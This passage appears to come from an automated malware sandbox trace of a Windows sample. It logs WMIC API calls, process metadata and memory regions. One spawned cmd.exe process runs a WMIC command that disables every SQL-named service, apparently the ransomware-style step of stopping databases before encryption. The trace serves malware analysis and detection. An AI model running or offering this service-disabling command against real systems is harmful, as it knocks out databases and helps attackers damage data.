[0114.818] lstrlenW (lpString="GET") returned 3 [0114.818] lstrlenW (lpString="CALL") returned 4 [0114.818] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0114.818] lstrlenW (lpString="LIST") returned 4 [0114.818] lstrlenW (lpString="CALL") returned 4 [0114.818] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0114.818] lstrlenW (lpString="ASSOC") returned 5 [0114.818] lstrlenW (lpString="CALL") returned 4 [0114.818] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0114.818] WbemLocator:IUnknown:AddRef (This=0xc30500) returned 0x3 [0114.818] lstrlenW (lpString="") returned 0 [0114.818] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.818] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0114.818] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.818] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.818] GetCurrentThreadId () returned 0xf0c [0114.818] GetCurrentProcess () returned 0xffffffff [0114.818] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xabf814 | out: TokenHandle=0xabf814*=0x270) returned 1 [0114.819] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xabf810 | out: TokenInformation=0x0, ReturnLength=0xabf810) returned 0 [0114.819] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0xd99118, TokenInformationLength=0x118, ReturnLength=0xabf810 | out: TokenInformation=0xd99118, ReturnLength=0xabf810) returned 1 [0114.819] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0xd99118*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0114.819] CloseHandle (hObject=0x270) returned 1 [0114.819] lstrlenW (lpString="GET") returned 3 [0114.819] lstrlenW (lpString="CALL") returned 4 [0114.819] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0114.819] lstrlenW (lpString="LIST") returned 4 [0114.819] lstrlenW (lpString="CALL") returned 4 [0114.819] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0114.819] lstrlenW (lpString="SET") returned 3 [0114.819] lstrlenW (lpString="CALL") returned 4 [0114.819] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0114.819] lstrlenW (lpString="CALL") returned 4 [0114.819] lstrlenW (lpString="CALL") returned 4 [0114.819] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0114.819] ??0CHString@@QAE@XZ () returned 0xabf7d4 [0114.819] GetCurrentThreadId () returned 0xf0c [0114.819] SysStringLen (param_1="\\\\") returned 0x2 [0114.819] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0114.819] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0114.820] SysStringLen (param_1="\\") returned 0x1 [0114.820] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0114.820] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0114.820] WbemLocator:IWbemLocator:ConnectServer (in: This=0xc30500, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xc60a30) returned 0x0 [0114.831] CoSetProxyBlanket (pProxy=0xc60a30, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0114.831] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.831] ??0CHString@@QAE@XZ () returned 0xabf7d0 [0114.831] GetCurrentThreadId () returned 0xf0c [0114.832] lstrlenA (lpString="") returned 0 [0114.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xd911a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0114.832] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0114.832] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0114.832] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x8bd7c794 | out: _String="Select", _Context=0x8bd7c794) returned="Select" [0114.832] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8bd7c794 | out: _String=0x0, _Context=0x8bd7c794) returned="*" [0114.832] lstrlenW (lpString="FROM") returned 4 [0114.832] lstrlenW (lpString="*") returned 1 [0114.832] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0114.832] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8bd7c794 | out: _String=0x0, _Context=0x8bd7c794) returned="from" [0114.832] lstrlenW (lpString="FROM") returned 4 [0114.832] lstrlenW (lpString="from") returned 4 [0114.832] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0114.832] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8bd7c794 | out: _String=0x0, _Context=0x8bd7c794) returned="Win32_Service" [0114.832] IWbemServices:GetObject (in: This=0xc60a30, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xabf7a8*=0x0, ppCallResult=0x0 | out: ppObject=0xabf7a8*=0xcbae10, ppCallResult=0x0) returned 0x0 [0114.870] IWbemClassObject:GetMethod (in: This=0xcbae10, wszName="ChangeStartMode", lFlags=0, ppInSignature=0xabf7b4, ppOutSignature=0xabf7a0 | out: ppInSignature=0xabf7b4*=0xcbb300, ppOutSignature=0xabf7a0*=0xcbb680) returned 0x0 [0114.870] IWbemClassObject:SpawnInstance (in: This=0xcbb300, lFlags=0, ppNewInstance=0xabf7c0 | out: ppNewInstance=0xabf7c0*=0xcbb878) returned 0x0 [0114.870] IWbemClassObject:GetNames (in: This=0xcbb300, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0xabf7c4 | out: pNames=0xabf7c4*="\x01ƀ\x04") returned 0x0 [0114.870] SafeArrayGetLBound (in: psa=0xc6f2a0, nDim=0x1, plLbound=0xabf770 | out: plLbound=0xabf770) returned 0x0 [0114.870] SafeArrayGetUBound (in: psa=0xc6f2a0, nDim=0x1, plUbound=0xabf7b8 | out: plUbound=0xabf7b8) returned 0x0 [0114.870] SafeArrayGetElement (in: psa=0xc6f2a0, rgIndices=0xabf7ac, pv=0xabf7d4 | out: pv=0xabf7d4) returned 0x0 [0114.870] IWbemClassObject:GetPropertyQualifierSet (in: This=0xcbb878, wszProperty="StartMode", ppQualSet=0xabf694 | out: ppQualSet=0xabf694*=0xc6da38) returned 0x0 [0114.870] IWbemQualifierSet:Get (in: This=0xc6da38, wszName="CIMTYPE", lFlags=0, pVal=0xabf664*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xabf664*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0114.870] IWbemClassObject:Get (in: This=0xcbb878, wszName="StartMode", lFlags=0, pVal=0xabf63c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xabf678*=11269728, plFlavor=0x0 | out: pVal=0xabf63c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0xabf678*=8, plFlavor=0x0) returned 0x0 [0114.871] IWbemQualifierSet:Get (in: This=0xc6da38, wszName="read", lFlags=0, pVal=0xabf67c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xabf67c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0114.871] IWbemQualifierSet:Get (in: This=0xc6da38, wszName="write", lFlags=0, pVal=0xabf67c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xabf67c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0114.871] IWbemQualifierSet:Get (in: This=0xc6da38, wszName="Description", lFlags=0, pVal=0xabf654*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xabf654*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0114.871] lstrlenA (lpString="Not Available") returned 13 [0114.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301d64, cbMultiByte=-1, lpWideCharStr=0xd99288, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0114.871] IUnknown:Release (This=0xc6da38) returned 0x0 [0114.871] lstrlenW (lpString="StartMode") returned 9 [0114.871] lstrlenW (lpString="StartMode") returned 9 [0114.871] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="StartMode", cchCount1=9, lpString2="StartMode", cchCount2=9) returned 2 [0114.871] SysStringLen (param_1="In") returned 0x2 [0114.871] SysStringLen (param_1="MaxLen") returned 0x6 [0114.871] SysStringLen (param_1="ValueMap") returned 0x8 [0114.871] SysStringLen (param_1="MaxLen") returned 0x6 [0114.871] SysStringLen (param_1="MaxLen") returned 0x6 [0114.871] SysStringLen (param_1="ValueMap") returned 0x8 [0114.871] lstrlenW (lpString="") returned 0 [0114.871] lstrlenW (lpString="STRING") returned 6 [0114.871] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0114.871] lstrlenW (lpString="string") returned 6 [0114.871] lstrlenW (lpString="STRING") returned 6 [0114.871] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0114.871] SysStringLen (param_1="In") returned 0x2 [0114.871] SysStringLen (param_1="ValueMap") returned 0x8 [0114.871] SysStringLen (param_1="ValueMap") returned 0x8 [0114.872] SysStringLen (param_1="ValueMap") returned 0x8 [0114.872] SysStringLen (param_1="ValueMap") returned 0x8 [0114.872] SysStringLen (param_1="ValueMap") returned 0x8 [0114.872] lstrlenW (lpString="Boot") returned 4 [0114.872] lstrlenW (lpString="Disabled") returned 8 [0114.872] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Boot", cchCount2=4) returned 3 [0114.872] lstrlenW (lpString="System") returned 6 [0114.872] lstrlenW (lpString="Disabled") returned 8 [0114.872] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="System", cchCount2=6) returned 1 [0114.872] lstrlenW (lpString="Automatic") returned 9 [0114.872] lstrlenW (lpString="Disabled") returned 8 [0114.872] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Automatic", cchCount2=9) returned 3 [0114.872] lstrlenW (lpString="Manual") returned 6 [0114.872] lstrlenW (lpString="Disabled") returned 8 [0114.872] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Manual", cchCount2=6) returned 1 [0114.872] lstrlenW (lpString="Disabled") returned 8 [0114.872] lstrlenW (lpString="Disabled") returned 8 [0114.872] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Disabled", cchCount2=8) returned 2 [0114.872] IWbemClassObject:GetPropertyQualifierSet (in: This=0xcbb878, wszProperty="StartMode", ppQualSet=0xabf69c | out: ppQualSet=0xabf69c*=0xc6dfb8) returned 0x0 [0114.872] IWbemQualifierSet:Get (in: This=0xc6dfb8, wszName="CIMTYPE", lFlags=0, pVal=0xabf680*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xabf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0114.872] IWbemClassObject:Get (in: This=0xcbb878, wszName="StartMode", lFlags=0, pVal=0xabf670*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xabf690*=11269136, plFlavor=0x0 | out: pVal=0xabf670*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0xabf690*=8, plFlavor=0x0) returned 0x0 [0114.872] IUnknown:Release (This=0xc6dfb8) returned 0x0 [0114.872] lstrlenW (lpString="string") returned 6 [0114.872] lstrlenW (lpString="string") returned 6 [0114.872] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0114.872] IWbemClassObject:Put (This=0xcbb878, wszName="StartMode", lFlags=0, pVal=0xabf734*(varType=0x8, wReserved1=0x0, wReserved2=0x70, wReserved3=0x0, varVal1="Disabled", varVal2=0xe0a2d241), Type=0) returned 0x0 [0114.873] IUnknown:Release (This=0xcbb300) returned 0x0 [0114.873] IUnknown:Release (This=0xcbb680) returned 0x0 [0114.873] IUnknown:Release (This=0xcbae10) returned 0x0 [0114.874] ??0CHString@@QAE@XZ () returned 0xabf680 [0114.874] GetCurrentThreadId () returned 0xf0c [0114.874] lstrlenA (lpString="") returned 0 [0114.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xd99c40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0114.874] lstrlenA (lpString="") returned 0 [0114.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xd99c40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0114.874] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0114.874] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0114.874] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x8bd7c71c | out: _String="Select", _Context=0x8bd7c71c) returned="Select" [0114.874] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8bd7c71c | out: _String=0x0, _Context=0x8bd7c71c) returned="*" [0114.874] lstrlenW (lpString="FROM") returned 4 [0114.874] lstrlenW (lpString="*") returned 1 [0114.874] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0114.874] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8bd7c71c | out: _String=0x0, _Context=0x8bd7c71c) returned="from" [0114.874] lstrlenW (lpString="FROM") returned 4 [0114.874] lstrlenW (lpString="from") returned 4 [0114.874] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0114.874] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8bd7c71c | out: _String=0x0, _Context=0x8bd7c71c) returned="Win32_Service" [0114.874] lstrlenA (lpString="SELECT * FROM ") returned 14 [0114.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0xd99c40, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0114.874] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0114.874] SysStringLen (param_1="Win32_Service") returned 0xd [0114.874] lstrlenA (lpString=" WHERE ") returned 7 [0114.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0xd98f08, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0114.875] SysStringLen (param_1=" WHERE ") returned 0x7 [0114.875] SysStringLen (param_1="caption LIKE '%MSSQL%'") returned 0x16 [0114.875] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0114.875] SysStringLen (param_1=" WHERE caption LIKE '%MSSQL%'") returned 0x1d [0114.875] IWbemServices:ExecQuery (in: This=0xc60a30, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%MSSQL%'", lFlags=48, pCtx=0x0, ppEnum=0xabf688 | out: ppEnum=0xabf688*=0xcbbfa0) returned 0x0 [0114.883] CoSetProxyBlanket (pProxy=0xcbbfa0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0114.922] IEnumWbemClassObject:Next (in: This=0xcbbfa0, lTimeout=-1, uCount=0x1, apObjects=0xabf68c, puReturned=0xabf678 | out: apObjects=0xabf68c*=0x0, puReturned=0xabf678*=0x0) returned 0x1 [0115.350] IUnknown:Release (This=0xcbbfa0) returned 0x0 [0115.351] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.351] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.351] GetCurrentThreadId () returned 0xf0c [0115.351] ??0CHString@@QAE@PBG@Z () returned 0xabf844 [0115.351] ??YCHString@@QAEABV0@PBG@Z () returned 0xabf844 [0115.352] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0xd9a0c8, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0115.352] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0115.352] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0xd99c40, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0115.352] __iob_func () returned 0x77ac1208 [0115.352] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0115.352] __iob_func () returned 0x77ac1208 [0115.352] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0115.352] ??1CHString@@QAE@XZ () returned 0x1 [0115.352] IUnknown:Release (This=0xc60a30) returned 0x0 [0115.353] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0115.353] _kbhit () returned 0x0 [0115.354] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0115.354] WbemLocator:IUnknown:Release (This=0xc30500) returned 0x2 [0115.354] IUnknown:Release (This=0xc607b0) returned 0x0 [0115.355] IUnknown:Release (This=0xc60620) returned 0x0 [0115.355] WbemLocator:IUnknown:Release (This=0xc30500) returned 0x1 [0115.355] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0115.355] WbemLocator:IUnknown:Release (This=0xc30500) returned 0x0 [0115.356] CoUninitialize () [0115.370] exit (_Code=0) [0115.370] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.370] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 251 os_tid = 0xf10 Thread: id = 252 os_tid = 0xf14 Thread: id = 253 os_tid = 0xf18 Thread: id = 254 os_tid = 0xf1c Process: id = "55" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x686d4000" os_pid = "0xf20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3618 start_va = 0x330000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3619 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3620 start_va = 0x360000 end_va = 0x373fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 3621 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 3622 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3623 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3624 start_va = 0x4410000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 3625 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3626 start_va = 0x7f9b0000 end_va = 0x7f9d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f9b0000" filename = "" Region: id = 3627 start_va = 0x7f9d8000 end_va = 0x7f9d8fff entry_point = 0x0 region_type = private name = "private_0x000000007f9d8000" filename = "" Region: id = 3628 start_va = 0x7f9dc000 end_va = 0x7f9defff entry_point = 0x0 region_type = private name = "private_0x000000007f9dc000" filename = "" Region: id = 3629 start_va = 0x7f9df000 end_va = 0x7f9dffff entry_point = 0x0 region_type = private name = "private_0x000000007f9df000" filename = "" Region: id = 3630 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3631 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3632 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 3633 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3634 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 3635 start_va = 0x4510000 end_va = 0x4513fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 3636 start_va = 0x4520000 end_va = 0x4520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004520000" filename = "" Region: id = 3637 start_va = 0x4530000 end_va = 0x4531fff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 3638 start_va = 0x4630000 end_va = 0x463ffff entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 3639 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3640 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3641 start_va = 0x4660000 end_va = 0x475ffff entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 3642 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3683 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 3684 start_va = 0x4540000 end_va = 0x45fdfff entry_point = 0x4540000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3685 start_va = 0x4760000 end_va = 0x479ffff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 3686 start_va = 0x47a0000 end_va = 0x489ffff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 3687 start_va = 0x4920000 end_va = 0x492ffff entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 3688 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3689 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3690 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3691 start_va = 0x7f8b0000 end_va = 0x7f9affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f8b0000" filename = "" Region: id = 3692 start_va = 0x7f9d9000 end_va = 0x7f9dbfff entry_point = 0x0 region_type = private name = "private_0x000000007f9d9000" filename = "" Region: id = 3693 start_va = 0x340000 end_va = 0x343fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 3694 start_va = 0x350000 end_va = 0x353fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3695 start_va = 0x4930000 end_va = 0x4c66fff entry_point = 0x4930000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 255 os_tid = 